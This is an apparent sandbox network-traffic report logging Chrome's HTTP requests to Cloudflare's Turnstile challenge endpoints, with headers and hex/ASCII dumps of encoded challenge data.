                                                                    2025-01-15 21:50:18 UTC16384OUTData Raw: 76 5f 39 30 32 39 31 34 38 34 64 61 31 39 63 33 33 32 3d 53 32 54 2d 50 49 62 4b 6b 75 32 66 32 66 36 32 62 39 62 75 57 24 72 4b 62 79 66 71 61 66 5a 2d 53 65 66 75 4d 6e 66 30 66 72 65 4a 49 66 71 2d 74 54 4a 51 66 78 50 2d 47 6b 49 55 54 66 53 49 66 49 65 62 43 66 79 74 65 52 66 59 2d 64 62 31 59 50 59 5a 65 66 74 2d 66 55 66 50 2d 66 32 75 55 2d 58 5a 36 66 61 2d 58 73 52 39 4e 58 66 6b 62 79 31 2d 39 76 66 73 2d 4a 73 58 73 51 66 58 65 6d 66 58 35 61 57 6e 52 56 49 62 4d 24 66 25 32 62 7a 66 66 53 7a 48 57 62 66 6b 66 59 34 47 63 71 59 24 76 2b 66 4a 42 46 34 51 77 36 4f 72 48 66 62 54 76 46 2d 24 77 49 34 54 64 66 75 4f 65 2d 73 59 62 49 31 4d 64 66 54 65 39 74 66 67 75 69 30 6b 64 74 31 46 55 77 4e 71 46 66 4d 42 71 53 4e 51 45 4a 57 36 44 62 4b 57
                                                                    Data Ascii: v_90291484da19c332=S2T-PIbKku2f2f62b9buW$rKbyfqafZ-SefuMnf0freJIfq-tTJQfxP-GkIUTfSIfIebCfyteRfY-db1YPYZeft-fUfP-f2uU-XZ6fa-XsR9NXfkby1-9vfs-JsXsQfXemfX5aWnRVIbM$f%2bzffSzHWbfkfY4GcqY$v+fJBF4Qw6OrHfbTvF-$wI4TdfuOe-sYbI1MdfTe9tfgui0kdt1FUwNqFfMBqSNQEJW6DbKW
                                                                    2025-01-15 21:50:18 UTC15833OUTData Raw: 42 77 49 6d 77 24 66 50 34 38 78 74 6b 59 55 67 31 4d 61 39 74 66 79 6f 64 6f 5a 66 62 34 66 63 66 39 24 66 57 66 4f 64 49 64 62 57 24 62 66 62 65 78 44 2d 54 2d 66 6b 62 47 66 79 2d 62 6b 66 49 66 62 2d 72 36 62 30 66 72 66 58 76 62 69 66 4c 79 59 39 66 4d 66 56 24 72 36 77 75 66 61 24 72 57 62 53 66 31 2d 62 36 66 4a 66 54 64 49 2d 62 57 24 71 66 49 76 66 43 66 62 64 49 2d 66 35 66 56 34 68 67 61 4b 66 75 66 53 4c 6c 4b 37 54 54 71 76 62 72 39 59 7a 39 65 4a 79 58 77 75 62 30 2d 39 2d 58 69 59 4b 76 6d 54 45 2d 4d 37 62 45 66 47 24 72 65 62 6b 4f 74 55 62 66 62 4f 34 56 46 48 63 66 55 32 6a 66 75 2d 62 32 46 35 54 70 6d 5a 76 66 75 70 51 78 66 48 31 4f 65 62 43 54 49 65 4f 74 33 6c 77 4c 75 54 76 4a 39 6c 43 30 4e 6b 59 76 62 6c 74 4b 55 62 73 4a 44 2d
                                                                    Data Ascii: BwImw$fP48xtkYUg1Ma9tfyodoZfb4fcf9$fWfOdIdbW$bfbexD-T-fkbGfy-bkfIfb-r6b0frfXvbifLyY9fMfV$r6wufa$rWbSf1-b6fJfTdI-bW$qfIvfCfbdI-f5fV4hgaKfufSLlK7TTqvbr9Yz9eJyXwub0-9-XiYKvmTE-M7bEfG$rebkOtUbfbO4VFHcfU2jfu-b2F5TpmZvfupQxfH1OebCTIeOt3lwLuTvJ9lC0NkYvbltKUbsJD-
                                                                    2025-01-15 21:50:18 UTC322INHTTP/1.1 200 OK
                                                                    Date: Wed, 15 Jan 2025 21:50:18 GMT
                                                                    Content-Type: text/plain; charset=UTF-8
                                                                    Content-Length: 26352
                                                                    Connection: close
                                                                    cf-chl-gen: REZGq2rAgq8uw9Gd4sr1hwzZSG8Tnk0B2tFD8jnIsh9eLkzY3B2NaffG0LgiicHe$Tlrj03AZK/NzWbTJPPS5FQ==
                                                                    Server: cloudflare
                                                                    CF-RAY: 902914a6bbf57ca2-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2025-01-15 21:50:18 UTC1047INData Raw: 57 31 4a 51 6c 4a 46 72 6d 4a 68 5a 68 6c 46 54 56 32 65 4e 63 33 70 74 64 36 52 62 6f 36 47 6f 58 35 69 48 64 59 47 63 66 34 56 37 6e 48 47 77 71 34 71 77 69 6e 65 6d 75 4b 70 35 66 6e 71 34 6a 5a 32 78 76 6f 36 7a 67 70 4b 57 6f 63 6d 59 67 38 32 75 71 72 47 63 77 70 32 39 6f 73 61 76 74 4b 53 35 7a 4e 76 55 30 4d 36 59 6f 61 48 42 34 61 36 36 71 4d 4f 30 74 39 57 36 75 4b 62 4c 79 74 7a 45 73 2f 58 49 79 66 54 6f 75 4f 66 59 39 4c 33 71 79 75 37 38 38 2f 44 7a 2f 65 48 56 41 65 72 37 34 41 48 65 7a 4e 77 42 37 75 54 51 46 75 6a 6c 2b 41 7a 57 37 66 41 61 43 2f 6f 52 47 67 73 53 46 76 59 51 47 51 58 6d 34 4f 67 71 43 2b 72 74 4a 53 7a 36 4a 78 45 47 4a 53 34 53 42 69 6e 36 45 51 6f 59 4d 68 34 50 47 67 48 32 45 68 48 35 42 7a 49 42 41 67 5a 44 42 78 67
                                                                    Data Ascii: W1JQlJFrmJhZhlFTV2eNc3ptd6Rbo6GoX5iHdYGcf4V7nHGwq4qwinemuKp5fnq4jZ2xvo6zgpKWocmYg82uqrGcwp29osavtKS5zNvU0M6YoaHB4a66qMO0t9W6uKbLytzEs/XIyfTouOfY9L3qyu788/Dz/eHVAer74AHezNwB7uTQFujl+AzW7fAaC/oRGgsSFvYQGQXm4OgqC+rtJSz6JxEGJS4SBin6EQoYMh4PGgH2EhH5BzIBAgZDBxg
                                                                    2025-01-15 21:50:18 UTC1369INData Raw: 65 58 6c 2b 52 64 71 52 7a 70 36 4f 4e 68 4c 43 77 6b 6f 39 6d 61 35 39 2f 70 61 75 50 64 72 43 77 69 35 75 71 6f 48 6d 43 6f 6f 47 6c 77 63 69 35 71 5a 2b 49 75 71 6a 4a 77 73 75 49 6d 35 48 54 6e 73 4c 50 6b 36 4c 4d 73 74 7a 4f 32 62 57 7a 77 75 48 63 34 4c 65 36 79 4e 57 6f 36 39 33 57 37 39 76 70 78 64 47 38 72 73 76 6e 38 75 2f 75 2b 2b 50 36 33 66 4c 48 39 66 54 4b 32 62 76 46 39 72 6e 63 34 75 4c 32 33 39 77 50 41 4d 72 4f 33 4f 62 30 34 74 41 4e 31 2b 76 75 47 67 6f 4d 46 2f 6b 58 45 2f 77 67 33 52 72 39 34 43 45 62 2f 43 7a 72 41 75 7a 37 41 53 59 6d 4d 51 66 39 42 42 66 32 45 77 4d 30 48 52 73 74 4c 68 38 4b 45 53 38 42 49 45 51 31 49 42 4d 31 53 67 6f 46 47 55 52 43 50 43 78 46 49 7a 63 74 49 68 4d 32 57 30 55 59 4e 43 73 7a 47 6b 6f 67 48 30
                                                                    Data Ascii: eXl+RdqRzp6ONhLCwko9ma59/pauPdrCwi5uqoHmCooGlwci5qZ+IuqjJwsuIm5HTnsLPk6LMstzO2bWzwuHc4Le6yNWo693W79vpxdG8rsvn8u/u++P63fLH9fTK2bvF9rnc4uL239wPAMrO3Ob04tAN1+vuGgoMF/kXE/wg3Rr94CEb/CzrAuz7ASYmMQf9BBf2EwM0HRstLh8KES8BIEQ1IBM1SgoFGURCPCxFIzctIhM2W0UYNCszGkogH0
                                                                    2025-01-15 21:50:18 UTC1369INData Raw: 66 71 32 4f 71 49 75 44 66 47 2b 56 6a 6e 43 6e 69 33 53 37 69 6f 69 52 75 61 43 76 75 33 75 4e 6c 48 32 38 76 61 61 53 6e 71 75 62 7a 61 72 42 6f 72 36 4e 79 4b 36 66 6a 61 75 30 32 73 36 76 76 64 47 6d 6c 64 69 54 75 74 43 77 33 38 47 37 33 63 58 59 74 72 33 4b 71 73 2b 37 33 65 66 30 7a 39 33 6e 72 75 2f 4e 39 2b 6d 36 2b 50 62 57 7a 63 47 2f 76 63 50 56 34 65 50 38 77 2f 6e 42 2f 76 6a 4e 79 51 34 4a 34 65 73 55 35 76 45 45 7a 77 58 31 39 68 33 30 39 66 6b 57 33 77 33 56 38 4e 33 78 38 78 77 41 39 51 4c 6a 4b 66 7a 71 35 77 63 4b 4e 65 73 74 36 50 45 51 4b 52 51 55 50 41 38 61 4b 30 45 56 39 50 6e 37 50 2f 67 31 52 45 73 47 4b 67 59 6a 54 6b 5a 52 4a 69 45 72 4b 44 55 30 4b 69 39 4b 4f 54 67 61 48 43 6c 68 4e 46 5a 55 55 46 6b 77 5a 57 41 7a 57 31 63
                                                                    Data Ascii: fq2OqIuDfG+VjnCni3S7ioiRuaCvu3uNlH28vaaSnqubzarBor6NyK6fjau02s6vvdGmldiTutCw38G73cXYtr3Kqs+73ef0z93nru/N9+m6+PbWzcG/vcPV4eP8w/nB/vjNyQ4J4esU5vEEzwX19h309fkW3w3V8N3x8xwA9QLjKfzq5wcKNest6PEQKRQUPA8aK0EV9Pn7P/g1REsGKgYjTkZRJiErKDU0Ki9KOTgaHClhNFZUUFkwZWAzW1c
                                                                    2025-01-15 21:50:18 UTC1369INData Raw: 71 53 6d 72 59 5a 77 73 62 53 78 74 58 79 31 74 4d 43 33 74 37 69 64 73 37 2b 39 6e 38 65 37 77 36 71 6c 76 38 65 73 72 4d 6a 53 71 61 54 51 76 38 79 6b 78 36 71 32 72 5a 32 31 71 64 4c 4c 30 74 50 56 78 73 43 2b 32 39 2f 49 76 4d 54 69 35 37 2f 6c 30 64 44 50 34 72 44 32 78 2b 6d 31 78 4d 6a 76 78 74 76 5a 32 76 76 75 7a 72 72 61 33 39 76 37 41 77 72 72 41 67 38 44 77 64 72 4f 41 65 38 43 39 52 6a 52 34 78 41 62 39 2f 67 4f 45 51 6f 4b 49 74 72 63 44 69 44 30 2b 42 76 6e 49 51 4d 6c 35 51 41 6b 43 41 73 53 38 69 41 58 43 51 6f 45 44 50 4c 79 47 41 63 53 46 7a 38 59 43 78 55 30 47 43 67 64 47 43 46 41 42 45 59 65 53 6b 4d 73 49 45 73 68 52 69 67 31 44 79 77 6a 4c 44 4e 62 4e 46 6b 6f 4d 45 70 4f 59 6a 55 59 57 78 38 35 4f 31 78 43 51 30 4a 42 4f 69 4d 74
                                                                    Data Ascii: qSmrYZwsbSxtXy1tMC3t7ids7+9n8e7w6qlv8esrMjSqaTQv8ykx6q2rZ21qdLL0tPVxsC+29/IvMTi57/l0dDP4rD2x+m1xMjvxtvZ2vvuzrra39v7AwrrAg8DwdrOAe8C9RjR4xAb9/gOEQoKItrcDiD0+BvnIQMl5QAkCAsS8iAXCQoEDPLyGAcSFz8YCxU0GCgdGCFABEYeSkMsIEshRig1DywjLDNbNFkoMEpOYjUYWx85O1xCQ0JBOiMt
                                                                    2025-01-15 21:50:18 UTC1369INData Raw: 32 56 65 37 65 78 6d 48 2b 76 6b 72 4f 74 74 71 32 36 75 36 61 30 71 70 4f 46 76 4d 32 76 6d 39 4b 65 78 61 6a 56 77 4d 4f 73 32 4e 6a 4a 71 39 32 75 30 5a 2b 35 6e 62 33 46 76 75 54 67 30 62 47 2b 35 4c 37 64 76 71 37 51 71 4d 47 79 76 4d 75 30 35 39 50 61 77 2f 50 70 30 4f 36 33 38 65 48 53 7a 50 33 34 39 65 48 61 41 4f 66 59 41 77 6e 6b 33 38 7a 36 7a 4f 33 6c 35 64 4c 6d 44 78 58 30 36 2f 33 7a 2f 4e 6f 69 48 4e 6a 73 32 39 66 35 34 65 45 55 49 41 33 71 47 53 41 46 37 53 37 73 46 44 50 6e 37 43 30 34 2b 52 6f 76 50 42 4d 38 49 45 48 7a 49 6a 30 44 48 52 6f 2b 42 7a 55 69 42 45 73 6b 42 52 67 51 45 69 34 6f 56 55 41 52 49 56 63 61 4e 69 38 57 53 54 6f 74 59 45 77 68 56 52 77 39 52 6a 73 68 50 57 42 6f 4a 56 74 63 5a 79 39 47 4d 58 41 73 4b 45 70 48 4e
                                                                    Data Ascii: 2Ve7exmH+vkrOttq26u6a0qpOFvM2vm9KexajVwMOs2NjJq92u0Z+5nb3FvuTg0bG+5L7dvq7QqMGyvMu059Paw/Pp0O638eHSzP349eHaAOfYAwnk38z6zO3l5dLmDxX06/3z/NoiHNjs29f54eEUIA3qGSAF7S7sFDPn7C04+RovPBM8IEHzIj0DHRo+BzUiBEskBRgQEi4oVUARIVcaNi8WSTotYEwhVRw9RjshPWBoJVtcZy9GMXAsKEpHN
                                                                    2025-01-15 21:50:18 UTC1369INData Raw: 4b 6d 4c 69 4c 6a 48 75 37 66 5a 36 32 68 70 71 57 79 73 32 2f 71 61 32 6e 6f 36 2b 4e 74 71 36 31 6b 4b 2b 78 74 36 79 76 73 4c 79 74 74 2b 4f 2f 32 4d 50 44 73 73 54 63 75 35 37 72 34 4c 65 34 37 39 75 7a 79 73 37 67 31 73 44 33 78 73 69 75 36 72 32 37 74 76 50 73 31 62 72 54 31 39 54 67 77 50 6e 69 36 66 76 4f 37 75 6a 49 7a 75 66 2b 43 41 72 76 38 4e 50 72 38 66 6e 36 39 76 44 32 44 39 6a 5a 37 53 54 6c 39 74 72 30 34 66 50 65 39 51 4d 41 34 6a 41 6d 41 2f 34 7a 4e 69 67 53 46 68 41 4d 47 50 55 66 46 78 37 34 47 42 6f 67 46 52 67 5a 4a 52 59 67 54 43 68 42 4c 43 77 62 4c 55 67 4b 43 31 51 66 49 79 52 59 52 53 67 30 4e 6a 4d 72 4b 6a 6f 69 4d 42 63 2b 56 54 31 43 61 47 51 72 54 57 42 4d 4f 30 73 2b 4d 31 4a 41 4c 6d 4a 44 56 47 78 36 66 46 64 62 53 45
                                                                    Data Ascii: KmLiLjHu7fZ62hpqWys2/qa2no6+Ntq61kK+xt6yvsLytt+O/2MPDssTcu57r4Le479uzys7g1sD3xsiu6r27tvPs1brT19TgwPni6fvO7ujIzuf+CArv8NPr8fn69vD2D9jZ7STl9tr04fPe9QMA4jAmA/4zNigSFhAMGPUfFx74GBogFRgZJRYgTChBLCwbLUgKC1QfIyRYRSg0NjMrKjoiMBc+VT1CaGQrTWBMO0s+M1JALmJDVGx6fFdbSE
                                                                    2025-01-15 21:50:18 UTC1369INData Raw: 6c 5a 47 52 71 70 57 56 75 36 4b 6b 6d 4a 6d 6c 6a 70 33 54 6f 5a 4f 67 31 37 47 57 70 4b 57 56 70 36 6d 58 30 4b 2b 73 76 4e 69 78 73 64 65 32 74 4c 66 46 75 61 71 69 79 64 7a 43 76 66 4f 2b 77 4d 48 42 77 74 44 45 2b 38 62 4e 79 65 2f 4f 7a 73 30 45 31 74 50 51 34 63 48 57 31 65 58 6d 33 73 4c 5a 36 75 4c 63 37 65 62 6c 34 2f 48 75 36 65 51 4d 36 75 7a 53 2b 66 33 65 37 43 54 75 2f 50 44 66 48 66 62 30 42 76 37 34 2b 44 41 50 2b 2f 7a 39 37 51 49 42 4f 42 62 32 42 69 77 50 43 66 49 61 44 77 30 51 48 68 63 53 45 69 49 6a 47 68 5a 4d 4b 78 34 61 51 42 73 70 48 55 51 76 49 43 4a 59 4a 79 73 6d 4e 56 45 6f 4b 6c 41 61 4c 69 35 6b 4d 7a 45 78 57 45 4d 33 48 30 59 37 50 54 78 4b 54 7a 30 6e 50 6c 4e 45 51 6d 68 47 4e 30 56 72 62 56 56 4a 67 47 4e 51 54 6c 35
                                                                    Data Ascii: lZGRqpWVu6KkmJmljp3ToZOg17GWpKWVp6mX0K+svNixsde2tLfFuaqiydzCvfO+wMHBwtDE+8bNye/Ozs0E1tPQ4cHW1eXm3sLZ6uLc7ebl4/Hu6eQM6uzS+f3e7CTu/PDfHfb0Bv74+DAP+/z97QIBOBb2BiwPCfIaDw0QHhcSEiIjGhZMKx4aQBspHUQvICJYJysmNVEoKlAaLi5kMzExWEM3H0Y7PTxKTz0nPlNEQmhGN0VrbVVJgGNQTl5
                                                                    2025-01-15 21:50:18 UTC1369INData Raw: 61 4b 67 75 63 2b 4b 7a 35 36 64 6a 73 2b 6c 6b 70 4c 49 78 61 62 49 6c 63 6a 50 30 4c 6a 4f 6e 64 32 68 78 37 48 59 77 4e 66 4b 35 61 6e 50 75 65 44 49 33 61 76 31 73 4d 50 58 73 4c 72 55 36 2f 48 38 79 39 6e 57 30 2b 4f 38 31 74 6a 78 43 4d 48 54 31 50 76 39 2f 4f 67 41 42 68 48 66 37 65 72 69 34 75 48 53 43 39 4c 70 38 76 41 4b 49 4e 6f 61 38 64 34 61 46 66 49 4a 43 77 73 56 2b 75 37 6f 2f 65 6f 6c 42 50 37 39 37 6a 58 75 43 44 6b 52 4a 68 55 2b 4f 77 77 67 2f 41 4d 74 4e 50 35 41 2f 68 59 66 48 54 56 4d 42 30 77 62 47 67 74 4e 43 79 52 46 4c 55 45 78 57 6c 4d 6f 50 46 51 66 54 46 41 62 48 52 73 79 4f 7a 6c 53 57 43 4e 62 4e 7a 6c 75 63 45 39 67 51 46 34 72 51 6b 74 4a 5a 47 67 7a 66 46 74 73 54 47 70 4c 53 6a 75 45 59 33 52 51 63 6a 39 57 58 31 31 31
                                                                    Data Ascii: aKguc+Kz56djs+lkpLIxabIlcjP0LjOnd2hx7HYwNfK5anPueDI3av1sMPXsLrU6/H8y9nW0+O81tjxCMHT1Pv9/OgABhHf7eri4uHSC9Lp8vAKINoa8d4aFfIJCwsV+u7o/eolBP797jXuCDkRJhU+Owwg/AMtNP5A/hYfHTVMB0wbGgtNCyRFLUExWlMoPFQfTFAbHRsyOzlSWCNbNzlucE9gQF4rQktJZGgzfFtsTGpLSjuEY3RQcj9WX111


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    27192.168.2.849750104.18.95.414434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:19 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/587605322:1736976641:hzSxMwNdKMvcs0n6J28XPhW8UvVhUfeqYsOGCs5a83Y/90291484da19c332/_SX7z.KCPU2XGGiOnMLS_Lppm3kR8Be8CF6Dp.QkJ_E-1736977813-1.1.1.1-Uj4fzoUrhuK3Sl.q1E2rsXgH8pmEEE06uw2Ire.ToEP2lXvUgKfDCFKrrfsra6uT HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:19 UTC442INHTTP/1.1 400 Bad Request
                                                                    Date: Wed, 15 Jan 2025 21:50:19 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 14
                                                                    Connection: close
                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                    cf-chl-out: 4yBTu/IRV9eaICjb1rROOBZHEO1q74i3kw+EFqO1Tp+YPd309X1Oh54FpXTZcjLHD/6G68sQRCEAqNWwoC9xWg==$CkkO6egLN0eEuFzg1hnuUQ==
                                                                    Server: cloudflare
                                                                    CF-RAY: 902914abfbb741ff-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2025-01-15 21:50:19 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                    Data Ascii: {"err":100230}


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    28192.168.2.849751104.18.94.414434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:25 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/587605322:1736976641:hzSxMwNdKMvcs0n6J28XPhW8UvVhUfeqYsOGCs5a83Y/90291484da19c332/_SX7z.KCPU2XGGiOnMLS_Lppm3kR8Be8CF6Dp.QkJ_E-1736977813-1.1.1.1-Uj4fzoUrhuK3Sl.q1E2rsXgH8pmEEE06uw2Ire.ToEP2lXvUgKfDCFKrrfsra6uT HTTP/1.1
                                                                    Host: challenges.cloudflare.com
                                                                    Connection: keep-alive
                                                                    Content-Length: 34621
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    Content-type: application/x-www-form-urlencoded
                                                                    CF-Chl-RetryAttempt: 0
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    CF-Challenge: _SX7z.KCPU2XGGiOnMLS_Lppm3kR8Be8CF6Dp.QkJ_E-1736977813-1.1.1.1-Uj4fzoUrhuK3Sl.q1E2rsXgH8pmEEE06uw2Ire.ToEP2lXvUgKfDCFKrrfsra6uT
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: */*
                                                                    Origin: https://challenges.cloudflare.com
                                                                    Sec-Fetch-Site: same-origin
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/bip52/0x4AAAAAAA5Dtl6jm2_BdC5F/auto/fbE/normal/auto/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:25 UTC16384OUTData Raw: 76 5f 39 30 32 39 31 34 38 34 64 61 31 39 63 33 33 32 3d 53 32 54 2d 50 49 62 4b 6b 75 32 66 32 66 36 32 62 39 62 75 57 24 72 4b 62 79 66 71 61 66 5a 2d 53 65 66 75 4d 6e 66 30 66 72 65 4a 49 66 71 2d 74 54 4a 51 66 78 50 2d 47 6b 49 55 54 66 53 49 66 49 65 62 43 66 79 74 65 52 66 59 2d 64 62 31 59 50 59 5a 65 66 74 2d 66 55 66 50 2d 66 32 75 55 2d 58 5a 36 66 61 2d 58 73 52 39 4e 58 66 6b 62 79 31 2d 39 76 66 73 2d 4a 73 58 73 51 66 58 65 6d 66 58 35 61 57 6e 52 56 49 62 4d 24 66 25 32 62 7a 66 66 53 7a 48 57 62 66 6b 66 59 34 47 63 71 59 24 76 2b 66 4a 42 46 34 51 77 36 4f 72 48 66 62 54 76 46 2d 24 77 49 34 54 64 66 75 4f 65 2d 73 59 62 49 31 4d 64 66 54 65 39 74 66 67 75 69 30 6b 64 74 31 46 55 77 4e 71 46 66 4d 42 71 53 4e 51 45 4a 57 36 44 62 4b 57
                                                                    Data Ascii: v_90291484da19c332=S2T-PIbKku2f2f62b9buW$rKbyfqafZ-SefuMnf0freJIfq-tTJQfxP-GkIUTfSIfIebCfyteRfY-db1YPYZeft-fUfP-f2uU-XZ6fa-XsR9NXfkby1-9vfs-JsXsQfXemfX5aWnRVIbM$f%2bzffSzHWbfkfY4GcqY$v+fJBF4Qw6OrHfbTvF-$wI4TdfuOe-sYbI1MdfTe9tfgui0kdt1FUwNqFfMBqSNQEJW6DbKW
                                                                    2025-01-15 21:50:25 UTC16384OUTData Raw: 42 77 49 6d 77 24 66 50 34 38 78 74 6b 59 55 67 31 4d 61 39 74 66 79 6f 64 6f 5a 66 62 34 66 63 66 39 24 66 57 66 4f 64 49 64 62 57 24 62 66 62 65 78 44 2d 54 2d 66 6b 62 47 66 79 2d 62 6b 66 49 66 62 2d 72 36 62 30 66 72 66 58 76 62 69 66 4c 79 59 39 66 4d 66 56 24 72 36 77 75 66 61 24 72 57 62 53 66 31 2d 62 36 66 4a 66 54 64 49 2d 62 57 24 71 66 49 76 66 43 66 62 64 49 2d 66 35 66 56 34 68 67 61 4b 66 75 66 53 4c 6c 4b 37 54 54 71 76 62 72 39 59 7a 39 65 4a 79 58 77 75 62 30 2d 39 2d 58 69 59 4b 76 6d 54 45 2d 4d 37 62 45 66 47 24 72 65 62 6b 4f 74 55 62 66 62 4f 34 56 46 48 63 66 55 32 6a 66 75 2d 62 32 46 35 54 70 6d 5a 76 66 75 70 51 78 66 48 31 4f 65 62 43 54 49 65 4f 74 33 6c 77 4c 75 54 76 4a 39 6c 43 30 4e 6b 59 76 62 6c 74 4b 55 62 73 4a 44 2d
                                                                    Data Ascii: BwImw$fP48xtkYUg1Ma9tfyodoZfb4fcf9$fWfOdIdbW$bfbexD-T-fkbGfy-bkfIfb-r6b0frfXvbifLyY9fMfV$r6wufa$rWbSf1-b6fJfTdI-bW$qfIvfCfbdI-f5fV4hgaKfufSLlK7TTqvbr9Yz9eJyXwub0-9-XiYKvmTE-M7bEfG$rebkOtUbfbO4VFHcfU2jfu-b2F5TpmZvfupQxfH1OebCTIeOt3lwLuTvJ9lC0NkYvbltKUbsJD-
                                                                    2025-01-15 21:50:25 UTC1853OUTData Raw: 4c 63 58 79 62 70 64 59 36 65 34 7a 73 2d 4c 69 39 77 37 39 33 31 4e 75 34 47 75 2d 24 47 49 79 65 68 32 5a 75 61 6d 4a 49 76 45 2d 4a 4c 35 58 24 4f 73 39 68 54 5a 24 71 49 74 32 70 45 66 39 76 32 4d 2d 66 5a 4e 32 47 38 42 45 64 51 32 59 32 50 74 2d 79 2d 59 31 62 62 66 49 55 4f 32 47 4d 79 69 2d 4a 5a 2b 59 66 57 50 4d 69 66 70 39 61 58 5a 33 4a 4e 32 6e 43 61 57 62 76 66 59 6f 69 55 30 48 66 77 78 73 30 49 72 64 46 68 36 6a 66 64 66 45 24 49 33 72 52 24 51 55 49 35 50 62 79 30 5a 4c 77 56 42 2d 65 56 6c 77 62 6f 2d 75 58 58 24 72 7a 54 50 73 6e 4e 66 4f 32 7a 2d 59 49 77 62 66 4d 31 4b 32 7a 57 71 32 32 62 57 66 5a 6f 65 76 47 54 66 78 71 64 6b 58 65 4e 33 66 74 6e 6d 58 42 79 54 59 2d 4e 36 66 5a 24 63 2b 58 58 30 57 24 57 4b 66 50 50 35 6b 36 55 58
                                                                    Data Ascii: LcXybpdY6e4zs-Li9w7931Nu4Gu-$GIyeh2ZuamJIvE-JL5X$Os9hTZ$qIt2pEf9v2M-fZN2G8BEdQ2Y2Pt-y-Y1bbfIUO2GMyi-JZ+YfWPMifp9aXZ3JN2nCaWbvfYoiU0Hfwxs0IrdFh6jfdfE$I3rR$QUI5Pby0ZLwVB-eVlwbo-uXX$rzTPsnNfO2z-YIwbfM1K2zWq22bWfZoevGTfxqdkXeN3ftnmXByTY-N6fZ$c+XX0W$WKfPP5k6UX
                                                                    2025-01-15 21:50:25 UTC1347INHTTP/1.1 200 OK
                                                                    Date: Wed, 15 Jan 2025 21:50:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4624
                                                                    Connection: close
                                                                    cf-chl-out-s: 8nM6Q9GlDmecylO1k/BQ19QYIGdq2CjCTSC8LRAJRY/MpteXgJoCEeEJzk04SpODs5BlS7qaFZaxInZ6rYCDQeR5w09fXM6VNcAfmQkYzI4+D6SjD4V65cjvR6x8FFIJOa061Xr6ea5IhCYrw21C28yOpFpd4kPgvRe+i+fFHofdxgalUy/JZA7gDJsenOGUQaK6+LKGiodgmmnCa3Ti9NKeIt4O2zCp9Y35+HGwx7O7o8NJ2FZcfvR9ywVw9V2kNSlqnDcA4JS5lDUujVCkbWYQys86uZmcnhAlpTiNHfAFd5D9ZeR6XXtMMPS0s1/xb3lNkQED4s/NXsOP+hhXk/u1AL8h4DIfT9ltBhwA0DNeiob4EeOM4LPvlYYtYiJZpQ1MNT29Mx7a89S8VDCAy5vqHM/4LIl4st6/q7du13j4nfOQB6XNKa3JNcs6HemyX2PIovGyJlSKTAN14feVGbE3M2DvfFbnodU4B0+GihgSBXSC/GNEbCjTRfz1w210yLOThT8/CuGIHigqLQqTnaD7mWuK1t8oWmKpV4RIucI5c9Na7m+sInRIOEnSOU9UC1V0ZmAc448cgDnxwSP+Vx9DHg4a7OPCmqD+LR98lT4if1mAKHPAy2FquIqSWmBzll7T+0MPiukNF1FCBT2WimnVsdKsdY8bL4clh1MWT8DFixSibDuindoAMyKkwjJYkGVYlrFcN6HPaPamfsNyS5twvqfcgcKKiNbNUCaXwo12yC4UUHzakl928GDMwVw01kLZBb99SEuFpY5O60YQR2pyTfi6ajBiJYyWe9To75e1J2VcIz+dNTPSBPofypVdShD7DihGQpphDoE+qn0d8WTAhqW6OkEj7xsiYcBPrLYDVzzhmt+Hh+sU0+SBeraQfya8XXMz+bgmVGbtrDzYscLpRlr2qeXlhRVsPFijkdUnjvxJkicbu74tknxbS3QK8dCnN0HOoIKes5a//DSJVVQeXyBT7aXIjqNpFviduzw=$xW/qI [TRUNCATED]
                                                                    cf-chl-out: tMAc4tiujmoYcgFWIPRuxHFJmNpzWLnMd6+sZVziITGjv9aWcOoVTTEYmcwlaSBL402qwnZyIE9WcmtLb0H2ZJ54F9wGUn+mMHbNGkxQG28=$WgjNc1sFWG6aIXY+o+P33A==
                                                                    Server: cloudflare
                                                                    2025-01-15 21:50:25 UTC62INData Raw: 43 46 2d 52 41 59 3a 20 39 30 32 39 31 34 63 66 39 65 63 64 37 63 62 34 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                    Data Ascii: CF-RAY: 902914cf9ecd7cb4-EWRalt-svc: h3=":443"; ma=86400
